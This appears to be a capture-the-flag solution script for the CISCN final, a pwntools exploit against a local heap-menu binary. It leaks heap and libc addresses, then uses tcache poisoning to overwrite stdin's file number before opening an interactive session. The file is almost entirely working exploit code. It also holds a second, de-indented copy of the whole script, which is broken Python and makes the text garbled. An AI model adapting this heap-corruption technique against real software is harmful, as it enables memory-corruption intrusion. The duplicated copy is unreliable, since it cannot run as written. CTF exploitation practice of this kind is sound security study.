Mech0n/CISCN-Final-2.py

## CISCN-Final-2.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def debug(p, cmd):
    gdb.attach(p, cmd)
    pause()

def menu(cmd):
	p.sendlineafter("which command?\n> ",str(cmd))

def add(type_node,number):
	menu(1)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))
	p.sendlineafter("your inode number:",str(number))

def remove(type_node):
	menu(2)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))

def show(type_node):
	menu(3)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))
	if(str(type_node)=='1'):
		p.recvuntil('your int type inode number :')
	else:
		p.recvuntil('your short type inode number :')
	return int(p.recvuntil('\n', drop=True))

def LEAK():
    add(1, 0x30)
    remove(1)

    for i in range(4):
        add(2, 0x20)
    remove(2)

    add(1, 0x30)
    remove(2)
    # debug(p, 'b *$rebase(0xF12)\n')
    chunk0_addr = show(2) - 0xa0
    success('CHUNK0 ADDR: ' + hex(chunk0_addr))

    add(2, chunk0_addr)
    add(2, chunk0_addr)
    # debug(p, 'b *$rebase(0x1052)\n')
    add(2, 0x91)

    for i in range(0,7):
        remove(1)
        add(2, 0x20)

    remove(1)
    main_arena = show(1) - 96
    libc.address = main_arena - 0x3ebc40
    file_no = libc.sym['_IO_2_1_stdin_'] + 0x70
    success('LIBC: ' + hex(libc.address))
    success('_file_no' + hex(file_no))

    add(1, file_no)

    add(1, 0x30)
    remove(1)
    add(2, 0x20)
    remove(1)

    chunk_fd = show(1) - 0x30
    add(1, chunk_fd)
    add(1, chunk_fd)
    add(1, file_no)

    # debug(p, 'b *$rebase(0xFD7)\n')
    add(1, 666)

    p.sendlineafter('which command?\n> ', '4')
    p.interactive()


if __name__ == "__main__":
    LEAK()
	#! /usr/bin/python
	#-- coding: utf-8 --
	from pwn import *

	context.terminal = ['tmux', 'splitw', '-h']
	context(arch = 'amd64' , os = 'linux', log_level='debug')

	p = process('./pwn')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

	def debug(p, cmd):
	gdb.attach(p, cmd)
	pause()

	def menu(cmd):
	p.sendlineafter("which command?\n> ",str(cmd))

	def add(type_node,number):
	menu(1)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))
	p.sendlineafter("your inode number:",str(number))

	def remove(type_node):
	menu(2)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))

	def show(type_node):
	menu(3)
	p.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(type_node))
	if(str(type_node)=='1'):
	p.recvuntil('your int type inode number :')
	else:
	p.recvuntil('your short type inode number :')
	return int(p.recvuntil('\n', drop=True))

	def LEAK():
	add(1, 0x30)
	remove(1)

	for i in range(4):
	add(2, 0x20)
	remove(2)

	add(1, 0x30)
	remove(2)
	# debug(p, 'b *$rebase(0xF12)\n')
	chunk0_addr = show(2) - 0xa0
	success('CHUNK0 ADDR: ' + hex(chunk0_addr))

	add(2, chunk0_addr)
	add(2, chunk0_addr)
	# debug(p, 'b *$rebase(0x1052)\n')
	add(2, 0x91)

	for i in range(0,7):
	remove(1)
	add(2, 0x20)

	remove(1)
	main_arena = show(1) - 96
	libc.address = main_arena - 0x3ebc40
	file_no = libc.sym['_IO_2_1_stdin_'] + 0x70
	success('LIBC: ' + hex(libc.address))
	success('_file_no' + hex(file_no))

	add(1, file_no)

	add(1, 0x30)
	remove(1)
	add(2, 0x20)
	remove(1)

	chunk_fd = show(1) - 0x30
	add(1, chunk_fd)
	add(1, chunk_fd)
	add(1, file_no)

	# debug(p, 'b *$rebase(0xFD7)\n')
	add(1, 666)

	p.sendlineafter('which command?\n> ', '4')
	p.interactive()


	if __name__ == "__main__":
	LEAK()